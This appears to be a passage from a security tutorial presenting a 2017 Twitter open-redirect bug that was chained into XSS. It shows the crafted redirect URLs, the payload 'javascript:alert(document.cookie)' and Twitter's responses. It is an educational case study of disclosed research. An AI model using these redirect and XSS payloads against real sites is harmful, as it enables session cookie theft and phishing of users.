On September 29^th, 2017, a researcher named Sergey Bobrov published a vulnerability that affected Twitter. This is a clear case of one of the examples we reviewed before.

Sergey Bobrov discovered the following redirection in Twitter's code:

https://dev.twitter.com/https:/%5cblackfan.ru/

By analyzing the application's response, he got the following result:

HTTP/1.1 302 Found
connection: close
...
location: https:/lackfan.ru

To exploit it, he entered a JavaScript code into the URL to be evaluated by the application, as follows:

https://dev.twitter.com//x:1/:///%01javascript:alert(document.cookie)/
    The HTTP response, generated by Twitter was:
    HTTP/1.1 302 Found
    connection: close
    ...
    location: //x:1/://dev.twitter.com/javascript:alert(document.cookie)
    ...
<p>You should be redirected automatically to target URL: <a href="javascript:alert(document.cookie)">javascript:alert(document.cookie)</a>.  If not click the link.
  

The preceding code caused the following XSS attack to be launched:

This is an interesting bug, because it mixes two vulnerabilities. It's also interesting because in 2017, practically all the browsers had security controls to avoid this type of user exploitation, protecting against phishing. Using the open redirect vulnerability, Sergey Bobrov circumnavigated the browser protection, launching the XSS on the user.